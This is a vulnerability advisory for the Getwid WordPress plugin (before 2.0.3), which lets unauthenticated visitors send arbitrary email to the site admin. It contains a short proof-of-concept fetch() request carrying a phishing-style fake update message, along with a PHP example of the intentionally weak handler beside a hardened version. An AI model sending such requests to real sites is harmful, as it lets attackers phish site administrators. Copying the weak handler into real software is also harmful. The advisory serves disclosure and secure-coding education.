wpexploit | Krzysztof Zając (CERT PL) | WPEX-ID:56A1C050-67B5-43BC-B5B6-28D9A5A59EBA
History: Dec 16, 2023 - 12:00 a.m.

Getwid < 2.0.3 - Unauthenticated Arbitrary Email Sending to Admin

2023-12-16 00:00:00
Krzysztof Zając (CERT PL)
Tags: getwid, unauthenticated, arbitrary email sending, admin, wordpress update

AI Score: 6.8 Medium (Confidence: Low)
EPSS: 0.001 Low (Percentile: 43.7%)

Description: Any unauthenticated user may send e-mail from the site with any title or content to the admin.

fetch("http://127.0.0.1:8001/wp-admin/admin-ajax.php?action=getwid_send_mail", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  // the nonce is in the page source under the recaptcha_v2_contact_form key
  "body": "data[subject]=Urgent WordPress update needs to be installed&data[message]=Fake notification for the admin with some link to be clicked&security=4c71dae953",
  "method": "POST",
});
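The root cause is that the only gate on the endpoint is a nonce every anonymous visitor can read from the page source, so it stops CSRF but is no authorization, while the caller also chooses the subject and the whole body. The hypothetical WordPress AJAX handler below is an added example, not Getwid's code or its fix; it contrasts that weak pattern with a hardened one in which the CAPTCHA is verified server-side and the mail is built from a fixed template (the action names, the option name and the form field names are assumptions).

```php
<?php
// Hypothetical WordPress AJAX mail handler (added example, not Getwid's code).
// Action names, option names and field names are assumptions.

// Weak pattern: the nonce is public, and the client supplies subject and body,
// so any visitor can make the site mail the admin arbitrary content.
add_action( 'wp_ajax_nopriv_example_send_mail_weak', function () {
    check_ajax_referer( 'recaptcha_v2_contact_form', 'security' );
    $data = wp_unslash( $_POST['data'] ?? array() );
    wp_mail( get_option( 'admin_email' ), $data['subject'] ?? '', $data['message'] ?? '' );
    wp_send_json_success();
} );

// Hardened pattern: the nonce only blocks CSRF; the anonymous submission is
// authorized by a server-side reCAPTCHA check, input is sanitized, and the
// subject and framing of the mail are fixed so the visitor cannot impersonate
// the site in the admin's inbox.
add_action( 'wp_ajax_nopriv_example_send_mail', function () {
    check_ajax_referer( 'recaptcha_v2_contact_form', 'security' );

    // Assumed option holding the reCAPTCHA secret key.
    $secret = get_option( 'example_recaptcha_secret' );
    $token  = sanitize_text_field( wp_unslash( $_POST['g-recaptcha-response'] ?? '' ) );
    $resp   = wp_remote_post( 'https://www.google.com/recaptcha/api/siteverify', array(
        'body' => array( 'secret' => $secret, 'response' => $token, 'remoteip' => $_SERVER['REMOTE_ADDR'] ),
    ) );
    $verdict = json_decode( wp_remote_retrieve_body( $resp ), true );
    if ( is_wp_error( $resp ) || empty( $verdict['success'] ) ) {
        wp_send_json_error( 'captcha failed', 403 ); // exits
    }

    $data    = wp_unslash( $_POST['data'] ?? array() );
    $name    = sanitize_text_field( $data['name'] ?? '' );
    $email   = sanitize_email( $data['email'] ?? '' );
    $message = sanitize_textarea_field( $data['message'] ?? '' );
    if ( '' === $message || ! is_email( $email ) ) {
        wp_send_json_error( 'invalid input', 400 ); // exits
    }

    // Fixed subject; visitor text is clearly labelled as untrusted in the body.
    $subject = sprintf( '[%s] Contact form submission', wp_specialchars_decode( get_bloginfo( 'name' ) ) );
    $body    = "A visitor submitted the contact form.\n\nName: {$name}\nEmail: {$email}\n\n"
             . "--- visitor message (untrusted) ---\n{$message}";
    wp_mail( get_option( 'admin_email' ), $subject, $body );
    wp_send_json_success();
} );
```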

